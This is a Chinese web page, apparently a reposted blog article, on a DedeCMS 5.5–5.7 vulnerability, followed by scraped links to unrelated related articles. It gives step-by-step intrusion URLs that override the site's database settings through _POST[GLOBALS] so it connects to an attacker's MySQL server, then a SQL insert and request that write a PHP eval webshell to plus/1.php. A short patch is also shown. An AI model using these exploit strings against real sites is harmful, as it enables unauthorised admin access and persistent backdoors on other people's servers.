mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面validate后面的字母改为当前的验证码,即可直接进入网站后台。
小编分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。下面给出官方的解决办法:
解决办法:
找到include/common.inc.php文件,把
foreach($_REQUEST as $_k=>$_v)
{
var_dump($_k);
if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ):
{
exit('Request var not allow!');
}
}
换成
//检查和注册外部提交的变量
function CheckRequest(&$val) {
if (is_array($val)) {
foreach ($val as $_k=>$_v) {
CheckRequest($_k);
CheckRequest($val[$_k]);
}
} else
{
if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
{
exit('Request var not allow!');
}
}
}
CheckRequest($_REQUEST);
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell
前题条件,必须准备好自己的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
====================================================
DedeCms v5.6-5.7 0day
其实除过windows系统,很多服务提供商是不让php连接外部mysql服务器的。
用PHPNow在本地搭建DEDECMS运行环境并安装DEDECMS,这里以DedeCMSV57_UTF8为例。
直接进后台:
dede/login.php?dopost=login&validate=8235&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=192.168.1.1&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=123456&_POST[GLOBALS][cfg_dbname]=dedecmsv57utf8&_POST[GLOBALS][cfg_dbprefix]=dede_
直接获得webshell:
进入自己在本地搭建的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');
在地址栏提交以下语句即可获得一句话木马plus/1.php:
plus/mytag_js.php?aid=1&_POST[GLOBALS][cfg_dbhost]=192.168.1.1&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=123456&_POST[GLOBALS][cfg_dbname]=dedecmsv57utf8&_POST[GLOBALS][cfg_dbprefix]=dede_&nocache=true
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞相关推荐
- linux虚拟主机用织梦,织梦程序用什么虚拟主机好
织梦程序用什么 织梦程序,即dedecms,是非常热门的一款网站系统.织梦程序,搭建方便,使用简单,而且植入了很多SEO优化元素.因此,很多资讯类的网站,大多采用该系统. 织梦程序,是基于PHP开发而 ...
- 如何判断一个网站是不是php,怎样查看一个网站是否使用织梦程序做的及其版本...
原标题:怎样查看一个网站是否使用织梦程序做的及其版本 对于一个自己看上的好网站,我们总是迫不及待的想知道它是用什么程序做的.然后自己也可以通过仿站.采集等做一个类似的站点.今天分享点如何判断一个网站是 ...
- 织梦charset.func.php,织梦程序百度php主动推送代码,亲测可用!
随着百度生态环境及算法改变,内容质量对于搜索引擎来说越来越重要了,那么信息的实时传达到蜘蛛抓取是每位站长必须做到的事情了,链接提交工具是网站主动向百度搜索推送数据的工具,工具可缩短爬虫发现网站链接时间 ...
- templets/default/index.htm Not Found! 图文教程 织梦程序的安装方法
针对织梦程序常见问题作出教程整理 新一代云虚拟主机 为性价比而生!硅云官网www.vpsor.cn 在一些模板网站(如AB模板网)上下载的整站源码,当然,一些个人会直接拿这些源码来卖,这个不是讨论的重 ...
- 织梦程序搬家后提示没有此用户名
织梦程序搬家后提示没有此用户名 我们经常会碰到客户搬家后提示用户名不存在,解决问题很简单,下面分享下几个排查方法,供大家学习参考. (此图片来源于网络,如有侵权,请联系删除! ) 排查一:dede_a ...
- 织梦网站木马生成一个php文件夹,dede织梦程序网站安全设置防范木马侵袭
dedecms织梦程序网站安全设置防范木马侵袭 需要删除修改的部分: 1.保持DEDE更新,及时打补丁. 2.装好DEDE后及时把install文件夹删除 3.后台目录改名,最好是改成MD5形式的,最 ...
- 织梦 plus/download.php,织梦DedeCMS 5.7SP1 /plus/download.php url重定向漏洞的解决方法
最近使用scanv网站体检发现有DedeCMS 5.7SP1 /plus/download.php url重定向漏洞(如下图),对比官方网站最新下载包发现该漏洞未进行补丁,但官方自身网站已经补上了,而 ...
- 织梦php安装无数据库,DeDeCms织梦程序安装及使用常见问题集锦
前言:织梦CMS作为国产CMS的老大,被众多用户使用并创建网站,作为国内知名的cms程序,使用广泛,但很多朋友对织梦还不太熟悉,经常容易出现本文中的问题,织梦58网本次统一整理出来,希望对新手朋友有帮 ...
- python如何执行代码漏洞_织梦dedecms最新远程代码执行利用脚本(python)
织梦CMS漏洞,就好比女人的大姨妈,每个月不来上一次,这就算是内分泌失调.代码是用python写的,小伙伴们自行调试吧!在前段时间,织梦爆出了一个远程文件包含漏洞.呃,感谢hoseph同学提供的代码吧 ...
最新文章
- UVa12096.The SetStack Computer
- pythond的执行原理_python基础——继承实现的原理
- mysql防止索引崩溃_MySQL优化之避免索引失效的方法
- jquery实现checkbox的单选和全选
- 目瞪口呆!137亿年的宇宙演化,竟然如此震撼!简直颠覆想象....
- VMWare虚拟机NAT模式静态IP联网配置
- 如何使用facenet详解_松下电吹风如何使用 松下电吹风使用方法及维护【详解】...
- 网络介绍 > 网络连接 > 混合云网络
- Qt之HTTP之模仿迅雷——根据URL获取文件信息(上)
- 在.NET环境中实现每日构建--NAnt篇
- 性能测试中的jvm监控
- GDB 调试器使用手册
- kubernetes Pod驱逐机制
- CUDA error: invalid device ordinal
- CVPR 2021 论文大盘点-超分辨率篇
- 无线渗透笔记(二)-《使用Aircrack-ng破解握手包》
- 北漂真的是你的归宿吗?
- 以太坊概念知识入门篇 1
- linux编程常用指令
- 安装Mathtype后无法使用——已解决